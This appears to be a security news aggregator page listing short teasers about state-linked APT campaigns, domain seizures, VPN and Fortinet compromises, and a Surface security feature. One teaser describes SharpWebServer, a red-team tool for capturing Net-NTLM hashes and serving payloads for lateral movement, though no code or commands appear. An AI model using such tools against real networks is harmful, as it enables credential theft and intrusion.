The return of TA402 Molerats APT after a short pause

TA402 APT group (aka Molerats and GazaHackerTeam) is back after two-month of silence and is targeting governments in the Middle East. The TA402 APT group (aka Molerats and Gaza Cybergang) is back after a two-month of apparent inactivity, it is targeting government institutions in the Middle East and global government entities with interest in the … Continue reading The return of TA402 Molerats APT after a short pause

Ferocious Kitten APT targets Telegram and Psiphon VPN users in Iran

Iran-linked Ferocious Kitten APT group used instant messaging apps and VPN software like Telegram and Psiphon to deliver Windows RAT and spy on targets’ devices. Researchers from Kaspersky reported that Iran-linked threat actors, tracked as Ferocious Kitten, used instant messaging apps and VPN software like Telegram and Psiphon to deliver Windows RAT and spy on … Continue reading Ferocious Kitten APT targets Telegram and Psiphon VPN users in Iran

BackdoorDiplomacy APT targets diplomats from Africa and the Middle East

ESET researchers discovered an advanced persistent threat (APT) group, tracked as BackdoorDiplomacy, that is targeting diplomats across Africa and the Middle East. ESET researchers spotted a new state-sponsored group, dubbed BackdoorDiplomacy, that was behind a series of cyberattacks against Ministries of Foreign Affairs aimed at numerous African countries, the Middle East, Europe, and Asia. The … Continue reading BackdoorDiplomacy APT targets diplomats from Africa and the Middle East

Russia-linked APT breached the network of Dutch police in 2017

Russia-linked cyberspies breached the internal network of Dutch police in 2017 while the authorities were investigating the crash of the MH-17. Russia-linked threat actors breached the internal network of Dutch police in 2017 during the investigation into the MH-17 crash. The intrusion was uncovered by AIVD, the Dutch intelligence service, but was not disclosed by … Continue reading Russia-linked APT breached the network of Dutch police in 2017

SharpWebServer – HTTP And WebDAV Server With Net-NTLM Hashes Capture Functionality

A Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes. To be used for serving payloads on compromised machines for lateral movement purposes. Requires .NET Framework 4.5 and System.Net and System.Net.Sockets references. Usage :: SharpWebServer :: a Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes … Continue reading SharpWebServer – HTTP And WebDAV Server With Net-NTLM Hashes Capture Functionality

US seizes domains used by APT29 in recent USAID phishing attacks

The US Department of Justice has seized two Internet domains used in recent phishing attacks impersonating the U.S. Agency for International Development (USAID) to distribute malware and gain access to internal networks. The two domains seized by the DOJ are theyardservice[.]com and worldhomeoutlet[.]com and were used to receive data exfiltrated from victims of the targeted … Continue reading US seizes domains used by APT29 in recent USAID phishing attacks

FBI: APT hackers breached US local govt by exploiting Fortinet bugs

The Federal Bureau of Investigation (FBI) says state-sponsored attackers breached the webserver of a U.S. municipal government after hacking a Fortinet appliance. "As of at least May 2021, an APT actor group almost certainly exploited a Fortigate appliance to access a webserver hosting the domain for a U.S. municipal government," the FBI's Cyber Division said … Continue reading FBI: APT hackers breached US local govt by exploiting Fortinet bugs

Re-Checking Your Pulse: Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices

On April 20, 2021, Mandiant published detailed results of our investigations into compromised Pulse Secure devices by suspected Chinese espionage operators. This blog post is intended to provide an update on our findings, give additional recommendations to network defenders, and discuss potential implications for U.S.-China strategic relations. Mandiant continues to gather evidence and respond to … Continue reading Re-Checking Your Pulse: Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices

Surface Laptop 4 showcases Microsofts new approach to PC security

Microsoft is bringing advanced hardware security to more Surface devices with cloud firmware management to help enterprises deploy new PCs quickly. Microsoft's Surface Laptop 4 is the second Surface device that uses Secured-core to protect the firmware. This brings what used to be optional security features that you had to test and manage, and then … Continue reading Surface Laptop 4 showcases Microsofts new approach to PC security

Pakistan-linked Transparent Tribe APT expands its arsenal

Alleged Pakistan-Linked cyber espionage group, tracked as Transparent Tribe, targets Indian entities with a new Windows malware. Researchers from Cisco Talos warn that the Pakistan-linked APT group Transparent Tribe expanded its Windows malware arsenal. The group used the new malware dubbed ObliqueRAT in cyberespionage attacks against Indian targets. The Operation Transparent Tribe (Operation C-Major, APT36, … Continue reading Pakistan-linked Transparent Tribe APT expands its arsenal